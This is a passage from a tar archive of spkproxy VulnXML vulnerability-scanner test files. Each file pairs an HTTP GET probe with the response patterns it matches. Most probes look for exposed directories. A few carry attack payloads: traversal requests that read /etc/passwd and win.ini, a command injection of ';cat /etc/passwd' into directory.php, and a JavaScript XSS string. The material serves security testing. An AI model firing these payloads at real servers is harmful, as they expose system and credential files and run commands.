in front of file name. CAN-2000-1076" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [fonts] 200 [fonts] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-246.xml0100664000076500007650000000734007566204543017564 0ustar davedave (ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd) "It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-247.xml0100664000076500007650000000737407566204543017574 0ustar davedave (ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini) "It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [windows] 200 [windows] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-248.xml0100664000076500007650000000704607566204543017571 0ustar davedave (cache-stats/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cache-stats/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-249.xml0100664000076500007650000000703007566204543017563 0ustar davedave (cart/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cart/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-24.xml0100664000076500007650000000723207566204543017476 0ustar davedave (blah-whatever.jsp) "The Apache Tomcat 3.1 server reveals the web root path when requesting a non-existent JSP file. CAN-2000-0759." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /blah-whatever.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ JSP file \\" 200 JSP file \\" 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-250.xml0100664000076500007650000000725207566204543017561 0ustar davedave (categorie.php3?cid=june) "Black Tie Project (BTP) can reveal MySQL errors and file system paths if an invalid cid is sent." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /categorie.php3?cid=june HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Unable to jump to row 200 Unable to jump to row 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-251.xml0100664000076500007650000000713707566204543017564 0ustar davedave (catinfo) "May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /catinfo HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-252.xml0100664000076500007650000000703207566204543017557 0ustar davedave (ccard/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ccard/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-253.xml0100664000076500007650000000705407566204543017564 0ustar davedave (cfcache.map) "May leak directy listing 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfcache.map HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Mapping 200 Mapping 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-254.xml0100664000076500007650000000711707566204543017565 0ustar davedave (cfide/Administrator/startstop.html) "can start/stop the server" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cfide/Administrator/startstop.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-255.xml0100664000076500007650000000720307566204543017562 0ustar davedave (class/mysql.class) "Basilix allows its configuration files to be downloaded 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /class/mysql.class HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ This program is free software 200 This program is free software 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-256.xml0100664000076500007650000000705207566204543017565 0ustar davedave (code/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /code/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-257.xml0100664000076500007650000000705207566204543017566 0ustar davedave (com) "Java class files may be browsable." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /com HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ index of 200 index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-258.xml0100664000076500007650000000705207566204543017567 0ustar davedave (COM) "Java class files may be browsable." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /COM HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ index of 200 index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-259.xml0100664000076500007650000000705607566204543017574 0ustar davedave (config/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /config/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-25.xml0100664000076500007650000000733307566204543017501 0ustar davedave (COM2.IMG%20src=\"Javascript:alert('Vulnerable')\") "Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking DOS device names. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /COM2.IMG%20src=\"Javascript:alert('Vulnerable')\" HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ alert\('Vulnerable'\) 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} alert\('Vulnerable'\) spkproxy/VulnXML/SiteTests/sitetest-260.xml0100664000076500007650000000703207566204543017556 0ustar davedave (Config1.htm) "This may be a D-Link 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Config1.htm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-261.xml0100664000076500007650000000726107566204543017563 0ustar davedave (contents.php?new_language=elvish&mode=select) "Requesting a file with an invalid language selection from DC Portal may reveal the system path." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /contents.php?new_language=elvish&mode=select HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-262.xml0100664000076500007650000000706007566204543017561 0ustar davedave (counter/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /counter/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-263.xml0100664000076500007650000000702707566204543017565 0ustar davedave (cpanel/) "Web-based control panel" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cpanel/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-264.xml0100664000076500007650000000720607566204543017565 0ustar davedave (cplogfile.log) "XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cplogfile.log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-265.xml0100664000076500007650000000705607566204543017571 0ustar davedave (credit/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /credit/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-266.xml0100664000076500007650000000706107566204543017566 0ustar davedave (custdata/) "This may be COWS (CGI Online Worldweb Shopping) 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /custdata/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-267.xml0100664000076500007650000000706407566204543017572 0ustar davedave (customers/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /customers/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-268.xml0100664000076500007650000000703707566204543017573 0ustar davedave (dan_o.dat) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /dan_o.dat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-269.xml0100664000076500007650000000702607566204543017572 0ustar davedave (dat/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /dat/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-26.xml0100664000076500007650000000703707566204543017503 0ustar davedave (docs/) "May give list of installed software" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /docs/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-270.xml0100664000076500007650000000703007566204543017555 0ustar davedave (data/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /data/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-271.xml0100664000076500007650000000702707566204543017564 0ustar davedave (database/) "Databases? Really??" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /database/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-272.xml0100664000076500007650000000703107566204543017560 0ustar davedave (databases/) "Databases? Really??" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /databases/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-273.xml0100664000076500007650000000702407566204543017563 0ustar davedave (db/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /db/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-274.xml0100664000076500007650000000703207566204543017563 0ustar davedave (dbase/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /dbase/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-275.xml0100664000076500007650000000702607566204543017567 0ustar davedave (dev/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /dev/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-276.xml0100664000076500007650000000703207566204543017565 0ustar davedave (devel/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /devel/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-277.xml0100664000076500007650000000704607566204543017573 0ustar davedave (development/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /development/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-278.xml0100664000076500007650000000723507566204543017574 0ustar davedave (directory.php?dir=%3Bcat%20/etc/passwd) "Marcus S. Xenakis directory.php script allows for command execution. CAN-2002-0434." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /directory.php?dir=%3Bcat%20/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-279.xml0100664000076500007650000000702607566204543017573 0ustar davedave (DMR/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /DMR/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-27.xml0100664000076500007650000000725307566204543017504 0ustar davedave (index.html.ca) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.ca HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we 